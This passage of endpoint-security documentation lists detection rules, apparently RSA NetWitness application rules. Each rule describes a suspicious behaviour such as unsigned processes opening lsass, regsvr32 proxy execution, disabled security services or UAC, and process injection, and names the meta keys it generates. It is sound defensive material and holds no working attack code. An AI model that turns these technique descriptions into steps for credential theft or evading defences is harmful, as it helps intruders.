Stops Security Servicestops_security_serviceStopping security service can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops security service
Stops Windows Update Servicestops_windows_update_serviceStopping windows update service can be a indication of someone trying to compromise the integrity of the security solution by not updating latest security updates and letting system vulnerable, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = stops windows update service
Sudo No Password Promptsudo_no_password_promptThe sudo user allows you to run programs with the security privileges of another user or, if no username is specified, as the superuser with root privileges. Adversaries can take advantage of this configuration to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file.
Suspicious File By Reputation Servicesuspicious_file_by_reputation_serviceFiles reported as suspicious by reputation service indicates execution of files and hashes of which are tagged as suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = suspicious file by reputation service
Suspicious REGSVR32.EXE Tasksuspicious_regsvr32.exe_taskRegsvr32.exe is a command-line program used to register and unregister object linking such as dynamic link libraries (DLLs), on Windows systems. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = suspicious regsvr32.exe task
System Integrity Protection Disabledsystem_integrity_protection_disabledThe feature for System Integrity Protection introduced in Mac OS 10.11 is intended to prevent malware from modifying protected system locations.Some low-level utilities may only function if they have unrestricted access to the file system and could be a legitimate reason for disabling the feature. However, even power users would generally have no reason to disable this setting and it would be considered a very suspicious behavior.
System Restore Disabledsystem_restore_disabledDisabling system restore can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = system restore disabled
Task Manager Disabledtask_manager_disabledTask Manager provides information about processes running on your system and their memory use. Disabling task manager may prevent a user from seeing anomalous processes.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = task manager disabled
Tasks In ProgramData Directorytasks_in_programdata_directoryTasks running out of a hidden directory indicates defense measures to hide malicious execution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = tasks in programdata directory
Terminates Processterminates_processTerminating process can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = terminates process
Transfers File Using BITStransfers_file_using_bitsBackground Intelligent Transfer Service (BITS) is a Windows component used to transfer files. It has commonly been used for malware distribution.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = transfers file using bits
UAC Disableduac_disabledDisabling UAC can be an indication of possible Windows User Account Control (UAC) bypass. Attacker can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = uac disabled
Unexpected csrss.exe Parentunexpected_csrss.exe_parentPresence of unexpected csrss.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected csrss.exe parent
Unexpected Explorer.exe Destination Locationunexpected_explorer.exe_destination_locationExplorer.exe at unexpected location can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain greater privileges than they are authorized for.
Unexpected explorer.exe Parentunexpected_explorer.exe_parentPresence of unexpected explorer.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected explorer.exe parent
Unexpected Explorer.exe Source Locationunexpected_explorer.exe_source_locationExplorer.exe at unexpected location can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain greater privileges than they are authorized for.
Unexpected lsass.exe Parentunexpected_lsass.exe_parentPresence of unexpected lsass.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected lsass.exe parent
Unexpected lsm.exe Parentunexpected_lsm.exe_parentPresence of unexpected lsm.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected lsm.exe parent
Unexpected msdtc.exe Parentunexpected_msdtc.exe_parentPresence of unexpected msdtc.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected msdtc.exe parent
Unexpected OS Process Destination Locationunexpected_os_process_destination_locationAn OS process at unexpected location can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain greater privileges than they are authorized for.
Unexpected OS Process Source Locationunexpected_os_process_source_locationAn OS process at unexpected location can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain greater privileges than they are authorized for.
Unexpected runtimebroker.exe Parentunexpected_runtimebroker.exe_parentPresence of unexpected runtimebroker.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected runtimebroker.exe parent
Unexpected services.exe Parentunexpected_services.exe_parentPresence of unexpected services.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected services.exe parent
Unexpected smss.exe Parentunexpected_smss.exe_parentPresence of unexpected smss.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected smss.exe parent
Unexpected Svchost Argumentsunexpected_svchost_argumentsPresence of unexpected svchost arguments can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected svchost arguments
Unexpected svchost.exe Parentunexpected_svchost.exe_parentPresence of unexpected svchost.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected svchost.exe parent
Unexpected taskhostw.exe Parentunexpected_taskhostw.exe_parentPresence of unexpected taskhostw.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected taskhostw.exe parent
Unexpected wininit.exe Parentunexpected_wininit.exe_parentPresence of unexpected wininit.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected wininit.exe parent
Unexpected winlogon.exe Parentunexpected_winlogon.exe_parentPresence of unexpected winlogon.exe can be an indication of someone pretending to be an authorized identity of a system in order to gain access to it or to gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unexpected winlogon.exe parent
Unknown Segmentunknown_segmentUnknown segment within a file that should be examined for malicious injection.
Unsigned Copies Selfunsigned_copies_selfA file copies itself as detected by checksum. A worm may self-replicate and spread infection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned copies self
Unsigned Creates Remote Threadunsigned_creates_remote_threadA file that is unsigned or with an invalid signature is trying to create a remote thread into a process. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = unsigned creates remote thread
Unsigned Creates Remote Thread And File Hiddenunsigned_creates_remote_thread_and_file_hiddenThis rule will return any unsigned and hidden files that leverage the Windows API "CreateRemoteThread" functionality.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned creates remote thread and file hidden
Unsigned Cron Jobunsigned_cron_jobThe software utility cron is used to schedule jobs (commands or scripts) to run periodically.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned cron job
Unsigned Deletes Selfunsigned_deletes_selfA file deletes itself as detected by checksum. Malware may be attempting to hide its spread through the network.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned deletes self
Unsigned Kextunsigned_kextKext signature validation is a code signing requirement for all extensions and drivers located in the extensions folder. A file that is unsigned should be examined as possible malware.
Unsigned Library In Suspicious Daemonunsigned_library_in_suspicious_daemonThis rule will trigger for OS MAC if an unsigned library is found associated with a suspicious daemon. Adversaries can inject libraries to be run in background processes like daemon for persistence and evasion.

VERSIONS SUPPORTED
* NetWitness Platform 11.4 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = unsigned library in suspicious daemon
Unsigned Module In Signed Processunsigned_module_in_signed_processAll threads spawned from a signed process should also be signed. An unsigned module may indicate process injection. Malware commonly utilizes process injection to access system resources through which persistence and other environment modifications can be made.
Unsigned Opens LSASSunsigned_opens_lsassThis rule will return any unsigned filename which opens/accesses the Windows OS process 'lsass.exe'. This type of activity can be indicitivate of credential stealers.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned opens lsass
Unsigned Reserved Nameunsigned_reserved_name

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = unsigned reserved name
Unsigned Runs Pythonunsigned_runs_pythonAn unsigned process is running a python script.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned runs python
Unsigned Writes Executableunsigned_writes_executableA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable
Unsigned Writes Executable To AppDataLocal Directoryunsigned_writes_executable_to_appdatalocal_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = unsigned writes executable to appdatalocal directory
Unsigned Writes Executable To AppDataRoaming Directoryunsigned_writes_executable_to_appdataroaming_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = unsigned writes executable to appdataroaming directory
Unsigned Writes Executable To Library Application Support Directoryunsigned_writes_executable_to_library_application_support_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library application support directory
Unsigned Writes Executable To Library Directoryunsigned_writes_executable_to_library_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library directory
Unsigned Writes Executable To Library Preferences Directoryunsigned_writes_executable_to_library_preferences_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to library preferences directory
Unsigned Writes Executable To Scripting Additions Directoryunsigned_writes_executable_to_scripting_additions_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to scripting additions directory
Unsigned Writes Executable To System Directoryunsigned_writes_executable_to_system_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to system directory
Unsigned Writes Executable To Var Directoryunsigned_writes_executable_to_var_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes executable to var directory
Unsigned Writes Executable To Windows Directoryunsigned_writes_executable_to_windows_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = unsigned writes executable to windows directory
Unsigned Writes To Autorununsigned_writes_to_autorunAn unsigned process is writing to autorun.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = unsigned writes to autorun
Uses LibNSSuses_libnssNetwork Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = uses libnss
Uses LibPCAPuses_libpcapLibPCAP may be used by an attacker to intercept network traffic.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = uses libpcap
Uses Mach Injectionuses_mach_injectionMach_inject is a C library that enables you to inject code into an arbitrary process on Mac OS X. Injection means copying over the necessary code into the target's address space and remotely creating a new thread to execute the code.
Uses Mach Overrideuses_mach_overrideMach_override is a C library to override one C function with another on Mac OS X.
Warning On Post Redirect Disabledwarning_on_post_redirect_disabledDisabling warning on post redirect can be an indication of an adversary attempting to block indicators or event notifications, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = warning on post redirect disabled
Windows Firewall Disabledwindows_firewall_disabledDisabling firewall can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.
Windows Task Runs Powershellwindows_task_runs_powershellWindows task running powershell can be an indication of someone trying to use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = windows task runs powershell
Windows Update Disabledwindows_update_disabledDisabling windows update can be a indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = windows update disabled
WMIC Remote Node Activitywmic_remote_node_activityThis rule returns instance of the Windows OS process 'wmic.exe' being leveraged with the '/node' parameter. With the proper credentials leveraged an attacker can get information about a system

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmic remote node activity
Wmiprvse Runs Command Shellwmiprvse_runs_command_shellWindows Management Instrumentation (WMI) is a component of the Microsoft Windows operating system that provides management information and control in an enterprise environment. Wmiprvse running command shell can be an indication of someone trying to run malicious commands in cmd.exe to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = wmiprvse runs command shell
Wmiprvse Runs Powershellwmiprvse_runs_powershellCommon cyber criminals and targeted attackers heavily use PowerShell, as its flexibility makes it an ideal attack tool for windows based systems. Wmiprvse running powershell can be an indication of someone trying to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmiprvse runs powershell
Wmiprvse Runs Scripting Enginewmiprvse_runs_scripting_engineWindows Management Instrumentation (WMI) is a component of the Microsoft Windows operating system that provides management information and control in an enterprise environment. Wmiprvse running scripting engine can be an indication of someone trying to run malicious scripts to exploit the system, which can be further used to gain access, to do lateral movement or to gain elevated privileges. Attackers may take advantage of this to proxy execution of code to avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = wmiprvse runs scripting engine
Writes Blacklisted Filewrites_blacklisted_fileAn analyst may mark files as blacklisted within NetWitness Endpoint. If actions on an endpoint involve those blacklisted files being written, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes blacklisted file
Writes Executable To Recycle Bin Directorywrites_executable_to_recycle_bin_directoryA technique has been used by malware authors where a malicious file or process is invoked and running out of the $RECYCLE.BIN folder on Windows systems. Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = writes executable to recycle bin directory
Writes Executable To Root Of Logical Drivewrites_executable_to_root_of_logical_driveA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = writes executable to root of logical drive
Writes Executable To Root Of Program Directorywrites_executable_to_root_of_program_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = writes executable to root of program directory
Writes Executable To Root Of Users Directorywrites_executable_to_root_of_users_directoryA file that is unsigned or with an invalid signature is trying to write an executable. Without the digital validation, this file should not be trusted without analysis.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file boc = writes executable to root of users directory
Writes Executable To System Volume Information Directorywrites_executable_to_system_volume_information_directory

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = writes executable to system volume information directory
Writes Graylisted Filewrites_graylisted_fileAn analyst may mark files as graylisted within NetWitness Endpoint. If actions on an endpoint involve those graylisted files being written, then this rule will trigger.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = writes graylisted file
Writes Malicious File By Reputation Servicewrites_malicious_file_by_reputation_serviceFiles reported as malicious by reputation service indicates execution of files and hashes of which are tagged as malicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes malicious file by reputation service
Writes Suspicious File By Reputation Servicewrites_suspicious_file_by_reputation_serviceFiles reported as suspicious by reputation service indicates execution of files and hashes of which are tagged as suspicious.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = writes suspicious file by reputation service

You are here
Table of Contents > RSA Application Rules for Endpoint

Attachments

    Outcomes